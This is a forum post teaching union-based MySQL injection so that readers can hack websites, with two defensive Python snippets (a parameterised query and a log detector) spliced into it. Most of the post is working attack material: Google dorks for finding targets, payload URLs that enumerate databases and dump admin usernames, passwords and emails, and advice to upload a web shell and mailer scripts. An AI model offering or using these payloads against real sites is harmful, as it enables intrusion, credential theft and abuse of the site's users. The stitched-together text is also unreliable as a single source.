Hello Nigerians, it's time to get serious with H@cking. All this while, we have been killing ourselves with Free Browsing Tricks while other countries keep

I'm Lightangel, a.k.a. Darkangel, Demon Hellion and so on. This season, I bring to you the Nigerian Cyber Army. Well, I've not been planning on opening this group, but I think someone already did; it isn't my problem, though, because that group is not really concerned with H@cking. What will happen is that I will teach you guys how to hack websites and forums, use exploits, and lots more.

First off, we have to start with Web H@cking, and the topic is MySQL Error Based Injection, which most hackers regard as basic SQLi. This is what we are going to learn:

# Finding vulnerable sites
# Finding amount of columns
# Getting MySQL version and current user
# Getting Databases
# Getting Tables
# Getting Columns
# Getting Usernames and Passwords

1. Finding vulnerable sites

Some helpful Google dorks to find them.

Code:
inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=

There are lots of dorks; I will talk about this later.

Let's say we have got a site:

http://site.com/news/view.php?id=828

If we add a ' before or after the number, it should look something like this if it's vulnerable:

http://site.com/news/view.php?id=828'

or...

http://site.com/news/view.php?id='828

If the website shows no error, it means it's not vulnerable, but if it shows one, then it's vulnerable. You should note, though, that not every website that shows an error can be hacked. Most times, the errors that occur look like this:

Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7

or

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)

Whatever error you encounter, know that the site is at least somewhat likely to be vulnerable.

# Finding amount of columns

To find the amount of columns in the database of the site you want to hack, you need to inject it with the order by query. Since our vuln site is http://site.com/news/view.php?id=828, we will add order by to see where the vuln columns lie. So we inject like this. Most times, the vuln columns are in the tens, I mean from 10 to 20, so to save ourselves some stress we will start from around 20 to see if it's really vulnerable.

http://site.com/news/view.php?id=828 order by 20--

If you see something like this:

Unknown column '20' in 'order clause'

this actually means that column 20 is vulnerable but it's not the last vuln column, so we need to find the exact last vulnerable column, and to do this we decrease the column number until it shows no error. So what we do next is this:

http://site.com/news/view.php?id=828 order by 17--

If it still shows an error, we still need to go back..

http://site.com/news/view.php?id=828 order by 15-- (error)

and so on...
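As an added illustration, not part of the original post, of why the stray quote produces the database error described above: a Python stand-in for a view.php that pastes ?id= into its SQL, beside the fixed version that validates the id and binds it as a parameter. The make_db, view_vulnerable and view_hardened names are assumptions, and an in-memory sqlite table stands in for the site's MySQL news table (the quoting behaviour that matters is the same).

```python
import sqlite3

def make_db():
    """Constructed stand-in for the site's news table (sqlite, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (828, 'Site news item')")
    return conn

def view_vulnerable(conn, id_param):
    """Mirrors a page that concatenates ?id= straight into the SQL string.
    Returns ('ok', rows) or ('error', message): the error branch is what the
    post above uses as the sign that the parameter is injectable."""
    sql = "SELECT id, title FROM news WHERE id=" + id_param
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.Error as e:
        return ("error", str(e))

def view_hardened(conn, id_param):
    """Same lookup with the id checked to be an integer and then bound as data,
    so quotes, 'order by' or 'union select' in ?id= are never parsed as SQL
    and no database error text reaches the client."""
    try:
        news_id = int(id_param)
    except ValueError:
        return ("ok", [])   # reject non-numeric ids instead of leaking an error
    rows = conn.execute("SELECT id, title FROM news WHERE id=?", (news_id,)).fetchall()
    return ("ok", rows)
```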
Until:

http://site.com/news/view.php?id=828 order by 11--

Now, we went downward until we got to 'order by 11' and got no error, which really means the column lies there. So if 'order by 11' gives no error and 'order by 12' does, it actually means the main column is 11. So we need to continue the injection.

Since it has 11 columns, we need to find the vulnerable number(s) among the columns, so this is what we do. We will union select the database and force it to produce the main numbers, and to do that we need to add a minus sign "-" after the ?id= or before the numbers after the ?id=:

http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8,9,10,11--

After this, the site will show certain numbers on the page; most times there are 3 of them. Let's say for example we found 5, 7 and 2 on the web page; it means those numbers are vulnerable. So we need to use the numbers to find the version. We will put '@@version' or version() in place of the vulnerable number. Here is how it will be:

http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,version(),8,9,10,11--

or...

http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,@@version,8,9,10,11--

Now watch the page as it loads; it will bring up something like this:

Code:
5.1.47-community-log

If its database version is 4 or lower, it means we have to go the hard way, I mean using blind SQL and all that. But since most of us are newbies, if it's 4 just leave it and inject another site. Anyway, if the database version doesn't show up, then let's do some small WAF bypassing by adding 'unhex(hex(@@version))'.

Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,unhex(hex(@@version)),8,9,10,11--

Heheheh, now, it's still not over. Next we need to find the schema name from the MySQL DB, and to do that we inject like this.
Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,group_concat(schema_name),8,9,10,11 from information_schema.schemata--

This can sometimes return more results than necessary, and that is when we switch over to this query instead:

Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,concat(database()),8,9,10,11--

Congrats! You now have the name of the database! Copy and paste the name somewhere safe; we'll need it later.

And now, this is the fun part where we will find the usernames, emails and passwords! To find the table names we use a query similar to the one used for finding the database, with a little bit extra added on:

Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing, but once you understand it, it really isn't, so I'll try to explain. What this query does is "group" (group_concat) the "table names" (table_name) together and gather that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) is the current "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters' worth of tables, so if you notice that a table is cut off at the end, switch over to limit, which I will explain now.

Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,table_name,8,9,10,11 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is show the first, and only the first, table. So if we were to run out of characters on, let's say, the 31st table, we could use this query:

Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,table_name,8,9,10,11 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1?
This is because limit starts counting from 0,1, which means that 30 is actually the 31st.

You now have all the table names!

Finding Column Names

Now that you have all of the table names, try to pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on, but it varies between sites. After deciding which table you think contains the information, use this query (in my example I'll be using the table name "Admin"):

Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error, but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).

UPDATE: If you get an error at this point, all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend". Hex/Char Converter: http://www.swingnote.com/tools/texttohex.php
3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added "0x"; all this does is tell the server that the following characters are part of a hex string. You should now see a list of all the columns within the table, such as username, password and email.

NOTE: Using the limit function works with columns as well.
Displaying the column contents

Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,group_concat(username,0x3a,password,0x3a,email),8,9,10,11 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon (:), which groups the output as username:password:email for each individual user, just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page and do what's necessary. Use any admin page finder, log in, upload a shell, then from the shell upload an IWP script, mailer script, and so on...

I'm awaiting your questions now. Please, admins, kindly stick this thread, as I will be very active in moderating it.
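Every step walked through above leaves a distinctive footprint in the web server's access log, which is how a site owner spots this probing. The following Python detector is an added example, not part of the original post: it URL-decodes each request's query string and tags the signatures of the steps described here (order by counting, the union select number list, @@version/version(), information_schema lookups, group_concat, 0x hex literals and unhex(hex())). The SIGNATURES, LOG_RE, classify_request and scan_log names are assumptions, and the log lines are constructed sample data.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures of the probing steps described in the post. They are applied to the
# URL-decoded, lower-cased query string, so %20 / '+' encoded payloads are caught.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),
    "union_column_probe": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "version_fingerprint": re.compile(r"@@version|\bversion\s*\(\s*\)"),
    "schema_enum": re.compile(r"\binformation_schema\.(schemata|tables|columns)\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),
    "unhex_hex_bypass": re.compile(r"\bunhex\s*\(\s*hex\s*\("),
}

# Constructed Apache-style access log lines (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news/view.php?id=828 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /news/view.php?id=828' HTTP/1.1" 200 611
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /news/view.php?id=828%20order%20by%2020-- HTTP/1.1" 200 598
203.0.113.5 - - [10/Oct/2023:13:57:10 +0000] "GET /news/view.php?id=-828%20union%20select%201,2,3,4,5,6,@@version,8,9,10,11-- HTTP/1.1" 200 5200
203.0.113.5 - - [10/Oct/2023:13:58:45 +0000] "GET /news/view.php?id=-828+union+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11+FROM+information_schema.columns+WHERE+table_name=0x41646d696e-- HTTP/1.1" 200 5340
198.51.100.7 - - [10/Oct/2023:14:01:00 +0000] "GET /news/view.php?id=829 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3} \d+')

def classify_request(path):
    """Return the names of the signatures matched by the request's query string."""
    # Decode %xx and '+' first so the payload is seen as the database would see it.
    decoded = unquote_plus(urlsplit(path).query).lower()
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(text):
    """Return (ip, path, tags) for every request that looks like an injection probe."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        tags = classify_request(path)
        # A lone quote in a numeric id is the very first probe the post describes;
        # on its own it is a weaker signal, so it gets a separate tag.
        if not tags and "'" in unquote_plus(urlsplit(path).query):
            tags = ["single_quote_probe"]
        if tags:
            hits.append((m.group("ip"), path, tags))
    return hits
```

Feeding a real log through scan_log and grouping hits by ip shows the full sequence (quote, order by, union select, information_schema) from one client within minutes, which is the pattern worth alerting on rather than any single line.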